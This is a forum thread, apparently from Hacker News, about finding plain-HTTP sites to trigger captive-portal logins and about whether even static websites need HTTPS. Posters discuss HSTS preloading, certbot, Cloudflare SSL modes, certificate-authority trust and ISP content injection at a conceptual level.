When I'm on free airport wifi they'll often limit the session to half an hour and then start MITMing your traffic to try to bounce you back out to the sign-in page to agree to the terms and conditions again. When that happens, the redirect won't work if you're trying to browse to an HTTPS URL. Worse, for many sites you can't tell your browser to "just go along with the MITM" because of HSTS.
So in airports I rack my brain for a website that might serve content over HTTP, not HTTPS. Alas, they're getting harder to find, and it's getting harder to keep those airport wifi sessions going. I half considered registering "alwaysinsecure.com" or "alwayshttp.com" so I could reliably find one... Now I'll probably just use qq.com, it's short and easy to remember.
Interesting. What the prescription here - to simply use http://neverssl.com in order to see if you need to re-authenticate to the captive portal? Is that correct?
It's not a technical or even standards setting problem. IIRC there's already a RFC for DHCP announced login webpage. It's business and legal - layer 8 and 9 problems.
Operating system maintainers have added captive portal detection to improve user experience. Hotspot owners often sabotage captive portal detection by whitelisting Apple and Google's CPD URLs! AAPL & GOOG have to change these URLs periodically and 802.11 vendors add the new ones in a cat and mouse game. So the customer's phone and thus customer think they're connected but they end up hitting a CP. Why? Because the CPD browser will close immediately upon receiving unencumbered Internet access. While many just want the legal liability limiting I Agree button to be tapped, many others owners want customers to see their store promotion/ad flyer page for longer than a second, place a tracking cookie, and do other value adds.
The interests of Wi-Fi network operators and users are not aligned. Right now only equipment manufacturers directly profit off Wi-Fi service. Hotspot owners can only indirectly earn money through attracting more hotel guests, cafe customers, etc. Some now harvest customer MAC address and in-store walking behavior. Ideally hotspot owners could receive a revenue share for offloading traffic from LTE, which would give them an incentive to be more loyal to users and maintain quality of experience.
I use example.org for that. I wouldn't be surprised if it has to stay available on http for hysterical raisins, such as everyone using it in their tests and outage detectors.
Almost all? You've had access to some pretty crappy captive portals.
In my experience most portals' firewalls block all traffic (at IP level) except ports 80 and 443, which are transparently redirected to their auth server. Tunnelling isn't an option because you just can't contact anything else.
And it's not like I'm describing something that's hard to do. You've been able to script this stuff in iptables forever.
Then how can they redirect you to anything in the first place? I type www.google.com in my browser and then what exactly happens next on the IP level? Think about it...
Sure, yup, oversimplifying to make the point. They are also transparently redirecting DNS to their own server.
My point is you can't "tunnel" out. Not for DNS, VPN or whatever. It's all blocked. The only services they let you access are their own to get you to authenticate. Even if you walked in with a complete hosts file (so didn't need to query any DNS server), you'd still not be allowed to connect, at firewall level until you authenticated.
> It could reply with anything, even a valid, correct response.
Which you actually need to do, to prevent locking the user out from the website they tried to access in the first place after authenticating, thanks to DNS pinning.
> The connection you make to that result is still going to be redirected to the portal.
Correct, but who cares? This is about DNS tunneling, there will be no connection anywhere, the DNS queries and their replies ARE the connection, so to say. How about reading up on what a DNS tunnel actually is? Considering your posts in this thread you have no clue how it works or at least have huge misconceptions about it.
Two ways for doing DNS tunneling:
1. direct way, you pass to your server through port 53.
2. indirect way, you pass through a "official" domain that you own and make the DNS of where you are communicate with your server.
For 1. it's not open very often, indeed. But for 2. I see it open all the time, even in banks...
What are you tunnelling to? In a proper captive portal, it's blocked.
I'm not talking about just blocking DNS. Or just blocking know DNS services. A good captive portal just denies everything save the web/dns traffic redirected to an internal server running on the portal. That is until you log in and get explicit allow rights.
If your portal isn't doing this, if you can escape and actually connect to external IPs, it's not captive.
They can't do that. If they reply with a bogus IP then after you authenticate to the CP, you cannot access the website you tried to access in the first place (eg google) because now your browser has cached the wrong IP address that it got earlier.
So they need to lookup the actual IP address on your behalf and then in turn redirect traffic to that IP to their CP. boom, you just managed to communicate to the outside world.
No they couldn't, unless they expect everyone to use a browser that is vulnerable to DNS rebind attacks, which probably means some browser from the 90s.
Every browser is vulnerable to DNS rebind attacks, since the burden of "fixing" it has been pushed onto the applications that are getting traffic forwarded by the browser.
Also services like Cloudflare wouldn't work if low TTLs didn't work. CF rotate IPs often as part of their DDoS protection.
They still do. Not like when DNS rebind was all the rage, where Firefox decided to cache DNS replies forever, but they still bump the TTL to a minimum of several minutes, which is enough to confuse people in the CP scenario. I wouldn't be surprised if some OS resolvers did the same, possibly just for performance reasons even. And that's all fine and dandy since those couple minutes don't break the Cloudflare scenario.
I mean, if it weren't the case, why would CPs work in that way then anyways? It wouldn't be an issue to have a DNS server in the mix that resolves everything to you CP address with a TTL of one second, and then additionally to your port 80 TCP redirect just add another one for 53 UDP. It's not being done by any CP solution I have ever encountered.
www.com is a short, easy to remember, parked domain I tend to use. It has some text ads, but is probably reasonably light on bandwidth.
neverssl.com, mentioned below, is one I seem to for some reason always struggle to remember it's name when I need it. I end up typing things like nossl.com or neverhttps.com and such...
For a long time I used my bank's homepage to get me redirected to the login page. Until the (reluctantly) forced HTTPS. Since then I'm using http://neverssl.com :)
I have public content that I'm willing to share over the web. To offer
it over HTTP, I only need a few thousand lines of code on top of TCP.
It's realistic to prove that that code has no memory-safety problems.
To offer it over HTTPS, I need to add tens of thousands of lines of
extra code related to cryptography. No existing implementation is
known to be correct. The popular implementations don't have a strong
history of code quality. It's completely reasonable to expect that,
over time, new vulnerabilities will be found that will allow attackers
to read or write to unintended memory locations on my server.
I totally understand that, by adding a popular but historically unsafe
cryptography implementation, I can help web clients to avoid MITM
shenanigans while reading my content. MITM indeed is a problem. But,
I'm not willing to make that my problem. The vast majority of my
customers don't experience MITM data modification while reading my
content. The vast majority of my customers wouldn't care if the whole
world knew that they have read my content.
Perhaps in the future, code for all the required cryptography layers
will be just as provably correct as code for reading the cleartext
HTTP protocol. When that day comes, I will add HTTPS. Not before.
I can't understand this opinion. So what if it only negativity affects a few users? How do you feel about ML that produces problematic results for a portion of users? Security is correctness.
> you saying that since HTTPS isn’t perfectly secure you’re gonna use the definitely insecure HTTP? What kind of logic is that?
Different sort of security. While I don't agree with OP, the logic here is somewhat sound: he is concerned about the threats against the server. It is reasonable to claim that TLS increases the attack surface, because any any vulns in TLS implementation would be purely additive to the potential vulns in the HTTP server.
HTTPS worst case: you yourself are harmed (e.g., if someone finds a zero-day in a cryptography library and uses it to run arbitrary code on your server)
Yeah because nobody has ever found rce bugs in other parts of the http server infra. The only way people get rce on your box is by exploiting tls libs. Right.
HTTP is simple enough I can literally create a barebones semi-compliant HTTP server from scratch. If all it has to do is serve some static pages, I can do this in ~1000 lines or less. I don't need any infrastructure beyond basic TCP/IP. Can't say the same about HTTPS.
I'd say you should be counting the lines of code needed to implement TCP/IP – as well as DHCP, ARP, Ethernet, maybe DNS, and anything else I've forgotten that your server needs to speak. Consider lwIP, the most common implementation of those protocols on microcontrollers: it's meant to be minimalistic, but it's still some ~35,000 SLoC, not including tests. For comparison, a minimalistic implementation of TLS is Amazon's s2n, which is ~12,000 SLoC. Adding s2n to lwIP would only represent an increase in code size of about one third.
Of course, a more typical HTTP/HTTPS server will be using the Linux kernel for networking (with some userland bits for DHCP and DNS), and OpenSSL for TLS – overall representing multiple orders of magnitude more code. But I suspect the proportion between TLS and non-TLS would be somewhere in the same ballpark, depending on how you count.
The problem is that on Linux, the TCP/IP stack is in-kernel, universal for everything on the system, and overall unobtrusive – it mostly 'just works' – while OpenSSL is in userland, has an unwieldy API and unstable ABI, can be linked in many different ways, requires a lot of configuration, and is overall a pain in the neck. So as a developer, the complexity of TLS weighs heavily on you, while the complexity of TCP/IP is something you can largely forget about.
Personally, I think TLS adoption would have been quicker if it had been implemented in the kernel and it just became a switch you could flip in the socket API; something like:
socket(AF_INET, SOCK_STREAM, PF_TLS)
But for better or worse, that's not how things panned out.
An option is to write your own web server and have the likes of Cloudflare provide TLS (and a bunch of other stuff!) on top of it for free. Best of both worlds.
>The vast majority of my customers don't experience MITM data modification while reading my content.
[citation needed]. You have no idea if that is the case or not. Too many ISPs inject ads, javascript, or other horrible technologies (flash) in to customers HTTP streams.
Users have no idea if what you are serving them is what they are receiving. If this is content like code samples they can be corrupted my malicious users. If it's political content the message can be altered.
<hyperbolic>I mean, we all know rurcliped is a Nazi, their website said so the other day. </hyperbolic>
It's worth noting that HTTP->HTTPS redirect is, in some sense, game-over already. A malicious actor upstream can mitm by blocking the redirect and providing an HTTP version to the client while communicating HTTPS to the server. sslstrip is one implementation.
A quick solution that solves many cases is to also use HTTP Strict Transport Security (HSTS), and declare it for at least a year. Then once the user visits the site (say from home) and gets the HSTS header, later visits in that time will always use HTTPS. This solves the problem in many cases.
The best solution is to get your site into the HSTS preload list. You can do that here: https://hstspreload.org/ - this adds the site to the Chrome list, and most other major browsers (Firefox, Opera, Safari, IE 11 and Edge) have an HSTS preload list based on the Chrome list. Once that happens and the browser updates, users will always use https, even if they ask for http.
That's why HSTS preloading is what you want to achieve. We've recently added openstreetmap.org and it was a fun project to make sure that everything would properly reply over https.
This is also why it's preferable to use TLS-only ports for SMTP (465) and IMAP (993) instead of using the STARTTLS protocol extensions. Mail clients aren't required to enforce STARTTLS and might fallback to plain text when an MITM blocks the extension.
Indeed the HTTP -> HTTPS redirect is only the first step in solving the problem.
A 301 redirect will offer some lasting protection as it can be cached but it's not really that great. The goal here is to take the first step to get on HTTPS and then longer term the sites can consider HSTS and eventually preloading.
The 'web' is kind of for the commons, but HTTPS is just a few steps away from being 'easy'. The steps required are frankly just a little too weird and ugly.
Most people making web sites, even many devs, don't necessarily want to, or have the wherewithal to deal with SSL.
Setting up SSL on AWS recently was a monster pain the rear for our little nothing project site, granted a lot of that was AWS oriented.
It needs to be easier, if it were easy, everyone would be doing it.
> many devs, don't [...] have the wherewithal to deal with SSL.
I can buy this for a non-dev clicking "Install Wordpress" in a legacy cpanel of a cheap shared web host (though in that case the web host should be setting up certs automatically for them), but what exactly is complicated about setting up certs for a dev? https://certbot.eff.org/ holds your hand through the entire ~30 second process. It's simpler than most other tasks a dev needs to do while setting up a website.
Sometimes it comes down to whether user-generated content with externally linked resources is allowed on the site. E.g. forums often allows embedding images by users and because users don't care about HTTP or HTTPS and only copy the image link from somewhere, you will end up with "mixed content" warnings and broken "locks" in the browser address bar all over the place.
The current alternative is to simply use HTTP, which doesn't yield any warnings. When Chrome will mark all non-HTTPS sites as insecure this will change, hopefully.
certbot has failed continually on my DO instance. It cannot update my cert on cron. I have to manually update my cert when I remember to do so. In fact, I had forgotten to do this for the last several months, so my site gets to display a nice scary warning for anyone who might venture forth and try https. I've searched how to fix it and nothing comes up. The site is static html and I've considered just removing https.
I use a cheap shared web host. My current and previous host both have LetsEncrypt implementations that take a couple of clicks. The former one was just default cpanel I think.
It is difficult if you want to understand the process, though no more so than, say, using Git IMO.
In short cpanel and other shared host panels make it as easy as the clicky-clicky Wordpress install
I agree, I found that comparison a bit odd. Certbot is many many orders of magnitude easier to use than Git, and that's even if you need to "use" it beyond the run-once-and-forget standard use-case
>but what exactly is complicated about setting up certs for a dev?
Seeing as how he mentioned AWS, it's a bit more complicated if you have a cluster of servers that are automatically managed. You have to set up a reverse proxy and integrate that into your cloud provider's workflow.
ACM combined with the various other services you need, especially Route53 or whatever, plus their byzantine new networking and security rules ... means you need to read a few sections of several different manuals to just do basic things.
AWS has become very complex over the last few years - there was a period where you didn't need admins. Now it seems you do again, just cloud admins, not local machine admins.
Our accuracy rate is currently around 99.6% so we're doing pretty well but of course I don't think it can ever be 100% either.
The biggest thing we've come across so far is geo-sensitive handling of requests. Some sites will redirect you to HTTPS or not based on where you are making the request from! This of course means you might see HTTPS and we see HTTP.
I think it's still fair to include those sites in this case because they aren't serving all traffic securely.
Hey, thanks for the extra insight, I do appreciate. Interesting to know that those sites show these behaviours too. Why could geo-location based redirect be interesting?
My guess would be that maybe sites have different infrastructure in different regions and maybe they aren't completely aligned on their progress. I really don't know why you'd intentionally have it like that.
I thought about country restrictions as well. I noticed most of the offending websites were in China. Wondering is having SSL there is not allowed or something.
It doesn't work every time for me. If i open it in a new private session (chrome or firefox) there is no redirection... Probably a faulty configuration on their side.
In Germany I thought if kind of sad, that a major automotive forum isn't https secured (motortalk.de). I was asking myself, how they manage their user's logins.
Then I checked. The are secured. Not sure since when, but maybe the data from whynohttps isn't as fresh as one might think.
And lot of bigger press sites (spiegel.de, faz.net. computerbild.de) aren't secured still. Kind of a shame imho.
The main reason for big media sites and forums not being https secured is the interest of the advertising community. There was a huge community discussion on sites like golem.de and Heise.de, which only recently switched to https. Login pages are protected almost all the time.
The site I was debugging was a WordPress site that had somehow gotten the images in its opening carousel set to http:// despite the fact that the "header" module had a default of https://. Very useful to just feed it the URL and notice these were the broken images; I could have grep'd through a "show source" page, but whynopadlock.com made it easy for me to identify that it was the header module of a site for which I had little familiarity.
bbc.com redirects to bbc.co.uk in the UK, which is served over HTTPS. They just flipped that switch a couple of months ago, so I'd assume that it won't be long before bbc.com is also HTTPS.
There is work undergoing to migrate bbc.com to HTTPS.
Most BBC sites in the UK have already been switched over the past few months. https://www.bbc.co.uk/news was finished about a month ago.
The BBC is a complicated beast and these sort of things take longer than you would think.
We redirect to http in the meantime to not have both being indexed.
Note that the "Flexible SSL" and even the "Full SSL" options don't protect the traffic between your server and Cloudflare. You you need to enable "Full SSL (strict)" as your SSL setting for that.
However, he is getting quite a sizable portion of all the security benefits on HTTPS even with the current setup. I think it's quite a bit better than plaintext http all the way. Troy Hunt has written well about this: https://www.troyhunt.com/cloudflare-ssl-and-unhealthy-securi...
You get a few benefits (protection against local interception) but it comes with a significant downside as it takes away the ability for an end user to identify if the connection is actually secure. For example I wouldn't enter my card details or other personal info on a HTTP site, but when CF is in front of
it, I have no way of knowing if that's strict HTTPS to the origin or if most of the connection goes insecurely over the internet. The other problem is that CF makes it very easy for less technical website owners to click a button, see a green lock and assume everything is fine.
Unfortunately not. If you aren't setting up HTTPS at your origin then the connection still goes unencrypted over the internet. Full (Strict) is the only secure SSL option at Cloudflare.
Officially, many countries and businesses agree that Taiwan isn't a country, while continuing in practice to do everything that only makes sense if Taiwan is in fact a country. This is an old game that fools no one. I wouldn't fuss about the name, we all know what's really going on, and the name game probably saves millions of lives. You might find this video clip interesting:
its not just the UN. Almost no country recognizes Taiwan as a sovereign state. No embassies in Taiwan. That is really weird but that is the current diplomatic situation.
I think both Taiwan and China officially say Taiwan is a province. Where they disagree is over which government is the legitimate central government of China.
What's the point of encrypting the sites in China anyway? I mean obviously everything you do online in China is tracked and not only that but shared - so is it maybe better in China to just not encrypt to safe on the additional power consumption? Really good green policy in China :D
It's doing something. After Google deployed TLS and obviously did not obey government data requests the government blocked Google domains entirely. Kind of like how Russia blocked Wikipedia entirely because TLS does not allow fine grained per page blocking.
I means it’s more about local corruption in China right which is driven by perverse economic pressures that come from an overbearing centerialized government power.
baidu and google.cn are high up on the list of non-HTTPS sites.
google.cn is an interesting one though: It redirects HTTPS to http, but the site consists of an image that redirects to google.com.hk which is https-only.
Who knows what you see in China when accessing google.cn...
Yes, but if you can midm the http connection you can appear the main site however you like. Including some login format or other way to obtain sensitive data.
...which is completely stupid because they score A+ on SSLlabs [0]. They even have HSTS etc., they really just have to preload it + add a 301 redirect.
You can figure out your own certs or manage the cert request/verification cycle via Let's Encrypt...or you can let someone else do it for you. I recently joined a company that offers HTTPS out of the box for any domain you own: https://blog.backplane.io/how-to-get-https-80e1b28b878c
I'm biased, but I do think it's a pretty painless way to enable HTTPS for sites both big and small. No uploading of certs, no modifications to your web app are necessary, it just works.
t.co is an unusual one. It's a link shortener that produces an https link if you give it an https link, or an http link if you give it an http link. At least I think that's how it worked but I'm having a hard time testing it now.
I expected less to be honest. The adult entertainment industry has been on a huge drive to encryption recently. It makes sense if you think about the content they serve, I guess people want more privacy there!
> I hate that I have to just because all you mofo's have forced me.
I can't empathize with this perspective.
"Encrypt every packet with strong cryptography" is the mission statement of the information security community ever since Edward Snowden went public.
The "mofos" have "forced" you to protect your users from attacks like QUANTUMINSERT.
The "mofos" have "forced" you to protect your users from abusive ISPs injecting advertisements that track them into web pages that gain no revenue from these ads.
The "mofos" have "forced" you to protect your users from being hit with increased malvertising and watering hole attacks because ISPs generally cannot secure their own systems.
I think the wins here far outweigh the temporary inconvenience of having to install/use certbot.
Why would strong-encryption be necessary for a video game guide web-page? Say, one about Factorio?
Some game communities are toxic. IE: Minecraft guides I'd host with https due to the threat of scumbags and hackers. But Factorio's community is incredibly lax and laid-back. So I would consider HTTPS to be a waste of effort and resources.
You're asking the wrong question, like many others who are resistant to HTTPS everywhere. HTTPS isn't for you, the site owner (although you gain the not insignificant benefit of knowing your content and traffic is untampered with). It's for the people that visit your site, so when you say HTTPS is a waste of effort and resources what you're inadvartently saying is that you don't give a fuck about your visitors - or at least, not enough of one to do the least you can to protect them from people who want to track and/or tamper with their browsing activity[1]. Especially since solutions like Let's Encrypt with certbot are free and take a couple of commands to set up.
[1] Unencrypted, pretty much everything about your internet traffic is laid bare for any middleman - your ISP, the person who controls the router you're connected to, some script kiddie on the same network as you - to both read and write. Injecting ads or cryptominers, tracking what pages you visit, changing what a page says, even straight up serving a different page. Why let your site/server be a (potential) vehicle for exploitation, disinformation and privacy invasion?
If the user is so paranoid about this sort of stuff, then they can go get a VPS and control a large chunk of the network for themselves.
For everyone else, its a game guide. The worst that can happen is that they get the wrong information about how Trains work in Factorio. There wouldn't be a need for me to track users or clicks or whatever in a hypothetical game guide community website.
As I stated before: I know some game communities (ie: Minecraft or Eve Online) can be toxic. But the Factorio community isn't like that. So I'd be comfortable hosting a Factorio webpage under HTTP.
If I were hosting a Minecraft or Eve webpage however (warning: toxic community ahead), then I'd host it under HTTPS due to the dastards who troll and harass others in that community.
----------
That's the more important part btw: understanding your audience. Some game communities are toxic and full of harassers, trolls and so forth. But other communities are lax, friendly, and can get away with lesser amounts of security.
> If the user is so paranoid about this sort of stuff, then they can go get a VPS and control a large chunk of the network for themselves.
And the last mile is still going to be just as unencrypted, non-private, and tamperable as before.
You literally cannot get end-to-end encryption/privacy without the host supporting TLS.
It's really not an optional thing to support for you as an operator, and especially now that Let's Encrypt is a thing, there's really no excuse for not doing it.
(Now that we're on the subject of toxicity anyway: I'd say that depriving your users from the ability to secure their network traffic, just because you're trying to die on a weird hill, is pretty toxic behaviour.)
But some webpages are simple, static one-off projects that I put out on behalf of a community. I don't believe in ads and would rather pay for all the bandwidth that my users would use. Consider it a donation "for the love of the game".
Very, very simple, nearly static webpages, close to "neocities" level of web design. No users, no passwords, just information I'm publishing to help a game community out.
Nothing to steal, nothing to phish, nothing. Pure text, maybe a few images and videos to elaborate on specific points.
I understand that TLS is important for any website with interactivity for privacy reasons. But the above webpage is completely static and non-interactive. Its old-school Web 1.0 stuff. There's nothing to steal, phish, or cheat here. Literally nothing.
I just don't see the point in HTTPS-ing this site.
I'm not sure why you aren't listening to other people. TANSTAASWS.
There ain't no such thing as a static website.... When someone can MITM you, the simple page you serve them can have all your content, with a complete redesign... Scripts, login places, anything the hacker chooses to put on it.
When you don't use HTTPS any middle man can take your content and do anything they want with it.
>Nothing to steal, nothing to phish, nothing. Pure text, maybe a few images and videos to elaborate on specific points.
So I was reading this site and am particularly concerned about the crypto miner present on the page. Care to explain this to me? Hint: MITM due to insecure context and the miner isn't coming from the site itself but as a user, I'm going to blame the site because it happens on the insecure site.
If you think a MITM can't do any harm with a static page then you simply aren't being creative enough.
> I understand that TLS is important for any website with interactivity for privacy reasons.
Then you understand wrong. It's important for any website, interactive or not, for privacy reasons. Reader privacy is a thing regardless of whether something is interactive. I don't know where you're getting the idea from that 'static' sites are somehow special.
I understand the importance of privacy in CERTAIN settings. Even if they're static.
For example, Eve Online would 100% be under HTTPS. Period. That online community is incredibly secretive, incredibly untrustworthy, full of scammers and requires every bit of security on EVERY webpage.
Factorio's community? Erm... no. Trolls just don't exist in that community. Unlike Eve Online, there's no warring factions of spies trying to take over each other's online turfs "outside of the game". Factorio is a lax community without any trolls or hackers.
A lot of it is understanding the userbase and general security posture. If I were a serious Eve Online player, I'd give 100% secure settings, as much as possible, due to the shennanigans that community is known for pulling.
From my understanding, Eve Online gamers transcend the game itself and stalk your habits to the "real world" settings. Infiltrating forums and such. So yes, I'd expect Eve Online players (the serious ones at least) to be very privacy sensitive.
But ultimately, I don't think that this vague concept of "privacy" when applied to a game guide really matters. People normally don't shuffle books and anonymize themselves as they put books back onto the library cart for example.
And I'm old enough to remember physical library cards with the names of everyone who checked out a book. I don't recall any privacy concerns about that. But maybe I'm just old-skool or something.
-------------
With regards to malicious ISPs MITMing their users: they kinda control your DNS requests, so good luck with that. I'm not sure if there really is a way to fully secure against an ISP-level attack against the users.
An ISP can always inject into the HTTP -> HTTPS redirection, and serve HTTP right there and then. HSTS assumes that the user has visited a clean version of your site before, if a new user comes in without ever seeing the HSTS, then the ISP still "wins" and captures your users on a fake HTTP version of your site.
So no, the level of attacks you've described, I don't believe HTTPS solves the problem.
The worst that can happen is malware Javascript, phishing re-directs are injected. Of course if the page itself has ad networks those are there by design.
Real story btw. I'm paying a bit of money for the host (not much though), I don't believe in ads taking money from the few reads I do get. Its basically a static page that costs pennies. I'm no longer updating the webpage, but I'm leaving it up just in case someone out there wants to learn more about the game. (It doesn't seem like any of the information is out-of-date. Its a few years old but the game hasn't changed in this aspect, so the information is still solid).
I just don't see any point converting this webpage into HTTPS.
Yes, I'm aware of MITM attacks and I'm also aware that fake certificates can be used to MITM even HTTPS sessions.
So I'm not convinced that HTTPS is the solution for that hypothetical attack. Not while untrustworthy certificate authorities are default-enabled on most clients anyway. At best, HTTPS complicates the attack but it doesn't make you immune to it.
A hypothetical MITM attacker can just get a fake certificate from a low-security vendor (ex: Comodo), and serve that to get a nice "trusted" version of the fake webpage. If you control the network, you control the certs that are eventually served to the users.
> At best, HTTPS complicates the attack but it doesn't make you immune to it.
That's literally all security. It isn't binary. It never is. At best, ASLR complicates ROP. At best, salts complicate breaking password hashes. At best, memory safe languages complicate buffer overflow attacks.
One could use your argument to dismiss basically all security. You've chosen zero mitm protection rather than a lot of mitm protection.
If you aren't using https then a network attacker with no preplanning can cause problems. If you are using https then a network attacker needs to get a bogus cert ahead of time. This costs money and time and does not scale well. Security is an economics issue. Making it more expensive to attack people is good.
Okay, I get what you're saying then. Your example isn't exactly the best example... but I "get" what you're trying to say at least.
You're saying that someone can inject a "redirect header" into a fake webpage, force that upon my users through the control of a network (WiFi router or whatnot), and use my domain name and my trust to take advantage of the users.
(Your example with the Zeus malware is bad because Zeus attacked the OS directly, so it wasn't a network attack. But hypothetically, lets say it was a network attack so that it remains applicable to my example)
Alas, HTTPS does NOT solve that, at least not while globally trusted HTTPS certificate roots remain insecure. They only need to get one HTTPS certificate signed by Comodo (or some other low-security HTTPS vendor) to attack my domain name in a manner like that.
That scam is mostly used through ad network vector not MITM. Btw it only references Zeus, it's not Zeus. A more subtle example is cryptocurrency miner scripts that result in your static page pegging a CPU core.
HTTPS raises the bar. There's no happily ever after in security. Maybe in five years domain hijacking and cert abuse will be as common as aforementioned fake tech support scams that prevent users from closing the tab. Some of them even set full-screen on desktop browsers and vibrate your phone (grr).
> That scam is mostly used through ad network vector not MITM.
Just one more reason why I'm not going to use ads to fund any web-projects I do.
-------
I agree that HTTPS raises the bar and makes it more difficult for certain scams. Indeed, I'd go as far as to say that any webpage with user-inputtable data (ie: username, passwords, etc. etc.) is required to be HTTPS. The risks are too great and that's the minimum security users expect these days.
But I'm still of the opinion that Web 1.0 style static-sites can be served with HTTP just fine. If there's no usernames, no interativity, and PURELY hosting static content in a community that's relatively lax (again: Minecraft and Eve Online fail. I'd use HTTPS even for a static site if I were doing Minecraft or Eve Online stuff), then I'd think HTTP is just fine.
> Christ you are ignorant about this kind of stuff.
Dude, I'm TRYING to have a discussion here. And frankly, I'm not fully convinced about the arguments that a lot of people are making here. Lobbing personal attacks is not cool, no matter the subject matter.
-----------
So hypothetically, you're saying a man-in-the-middle attack is going to change the content of my files. I understand.
Now tell me: how does HTTPS secure against that if Comodo certificates (or other poor-security certificate authorities) continue to exist?
A SINGLE bad certificate authority trusted by any of the major vendors would allow the attack you so described happen over HTTPS.
I have seen these things happen. HTTPS is not a magic cure-all, not while globally trusted bad CAs exist. Bad actors can still MITM HTTPS sites with a fake cert.
ISPs typically have some degree of HTTP proxying and caching available btw. You don't benefit from HTTP proxies / caches if you encrypt everything. So there's a reason. And if the bad actors can attack HTTPS with a MITM attack anyway, there's not much to gain from HTTPS from my viewpoint.
If a user goes to http://site.com, even if you have a redirector to the https://site.com version, the https version can be MITM'd with a self-signed certificate.
> If a user goes to http://site.com, even if you have a redirector to the https://site.com version, the https version can be MITM'd with a self-signed certificate.
At which point their browser will give them a big scary security warning.
ISPs and other network operators are notorious for injecting content into webpages [0]. Even if someone is doing this for "harmless" or even "benevolent" reasons, someone else is cryptocurrency mining, tracking, nefariously manipulating content, etc.
Because otherwise an ISP might insert ads, or some adversary changes the content and inserts malware. Also, as a consumer of your blog I want privacy, no need for ISP to know what I click on and read exactly. These are just a few reasons why.
> Also, as a consumer of your blog I want privacy, no need for ISP to know what I click on and read exactly.
In this hypothetical example, you're clicking on a video game guide. Someone watching you buy games from Gamestop would have more information than someone watching you click on "How Factorio Trains Work" or something else on this hypothetical example.
If the reverse DNS points to the IP address of the blog (ie: people see that you're browsing "FactorioGuide.com"), they're gonna figure out that you're learning how to play the game Factorio in any case. Even if all the traffic were encrypted.
The only way people don't know what you're doing is if the guide were on a shared host with many-many webpages on a singular IP Address. But otherwise, the typical website (ie: self-hosted on a VPS) would have a unique IP Address and a unique reverse-DNS entry. And people would figure out how long you've been browsing and what you've been looking at, even through HTTPS.
If the site is using Cloudflare (free), AWS CloudFront (cheap), or another CDN, it won't have a unique IP address. For now, the domain name will still leak in plaintext through DNS and over the TLS connection in the SNI field, but browsers are planning to implement DNS over HTTPS [1], and encrypted SNI is on the way [2].
There's really not a need to. Others have pointed out that your ISP might inject ads, or something similar, another thing is encrypting only the traffic you want to keep secret leaks information about the fact that you're doing something you want to keep secret.
These are not issues that are likely cause great damage, so no, there is no need to encrypt every last bit of traffic. But the bigger question is "Why wouldn't you encrypt it"? There's really not a lot of reasons not to.
Your argument, out of everyone else's, is the most sane. So lemme point this out:
> But the bigger question is "Why wouldn't you encrypt it"?
You're right. There's not a lot of good reasons I can think of. The best argument I've been able to come up with is ISP-level caching of HTTP traffic, which may save on bandwidth. But my host doesn't even charge for the measly amounts of bandwidth I use, so that's certainly not a concern.
Modern servers have HTTPS hardware-acceleration in the form of AES-NI, so it doesn't even use much more CPU power to use TLS these days.
So really, bandwidth savings from ISP-level caching is the best counter-argument I've got. Which is to say: not a very big concern of mine.
Okay, I am going to make free hotspot that serves your site as default starting page but with javascript malware downloader.
All people will assume that your page is installing malware on their hardware. Non tech people will not understand that was this free hotspot.
Now move a bit further, someone at ISP or network somewhere in world injects malware only into traffic of your page. I visited your page I got malware installed or my AV started alarms. Would they know that was not your site serving malware?
But you could do that under HTTPS, with a self-signed certificate and have it load under HTTPS anyway. Or a variety of methods to get an illegitimate certificate trusted to some subset of users.
But I can't do that in the moment. Without HTTPS I sit on the network and see a clear request to your website. I intercept it and cause problems. With HTTPS I need to have planned ahead of time to target your website specifically and spent time and money on getting a bogus cert for your website. If your website is small I am not likely to do that. But I don't care how big your website is once I'm seeing cleartext traffic.
Hmm, well, in this case its as easy as running a script and clicking a button from this particular host. So I guess there's no major reason why not to do it (and it seems like my provider is defaulting to TLS from Lets Encrypt on any new sites made anyway). So its the new default way of doing things.
I'm not entirely convinced that it solves the MITM attack still. But I'm still not convinced that the arguments a lot of people are making around here necessarily make sense either. A lot of these attacks are fundamentally theoretical and don't seem broadly applicable.
The main argument that convinced me is: its easy to do, so why not? But the scare tactics that a lot of people in this discussion are unsavory to me and are unintelligent IMO.
All 3 of the concerns GP listed are completely agnostic to the topic of the web page or the behavior of its audience. It's not your fellow webpage visitors or community that are most likely to be in a position in the network to be doing MITM attacks.
So the solution is to run code that I have no idea if it will function properly on my host to see if it will work? But this is all supposed to be super easy, right? I was just supposed to be able to run certbot, and now I just need to run this random package that I hadn't heard of until 5 minutes ago.
It's almost like this isn't a super simple process for everyone.
> "Conditional support for OpenBSD's sandbox, Mac OS X, or experimentally on Linux."
What now? I get to experience experimental functionality?
This is like taking a stand against seatbelts. No one can do you from doing so, but it makes very little sense to and seems like it has more to do with an insistence of being contrary than to make a point or actually change something.
But the heavily flawed PKI is rapidly improving from the dumpster fire it has been. The glaring 'blindly trust every CA to never go rogue' problem is on the edge of being solved, with browsers beginning to require CAs to submit all new certificates to Certificate Transparency logs in order to be accepted. Attackers would have to either compromise multiple targets in detectable ways, or publicly disclose their forged certificate to the world before they can use it, at least once the older certificates from the dark ages of 2017 have all expired in a few years.
Sure, PKI has serious problems. But HTTP without HTTPS has far worse problems. Nothing is perfect. Waiting for the perfect, while failing to help in easy ways that you can do now, is a poor choice.
In any case, HTTPS doesn't protect your site, it protects the users of your site (by protecting the confidentiality and integrity of the data in transit). If you don't care about your users, then those potential users should avoid your site.
MITM attacks have become pervasive. HTTPS was less important years ago, but that time has passed. For example, ISPs, hotels, airlines, and many others have decided that it's okay to attack their customers. Supporting HTTPS is an easy way to help those users. It doesn't need to be perfect to be useful.
Chrome isn't forcing anyone, it's just making it clear to users that a non-https site is insecure, which it is. What's the problem with providing information so that users can make an informed choice about whether to use the site?
Google is the major player pushing everyone to encrypt with HTTPS with other companies hopping on board. They argued a populist viewpoint with what Snowden revelaled they need to protect the public, but the real reason they pushed HTTPS so hard has more to do with protecting their business and getting more metadata.
It's no secret ISP's are consolidating and being bought up by media conglomerates who want to secure the distribution method for their product and exclude competitors in a new market. Those companies view the internet like they view cable TV; it exists to deploy entertainment and advertising to the public and to convert people into products for companies. But they need a mechanism to figure out what is engaging, e.g. Nielsen Ratings.
There's only one thing more accurate than the traditional web bug or javascript running on a webpage, and that's actually MITMing the traffic and extracting the data raw. If you own the ISP you can do this. You can also inject ad's. Ad's and Rating websites is something Google has built their business on.
I'm really sure they have a sour taste in their mouth left over from from google fiber due to the politics of ILECs trying to protect their literal state-granted monopoly. And in all seriousness, with POTS being retired, the government is granting monopolies over last-mile wire to cable co's.
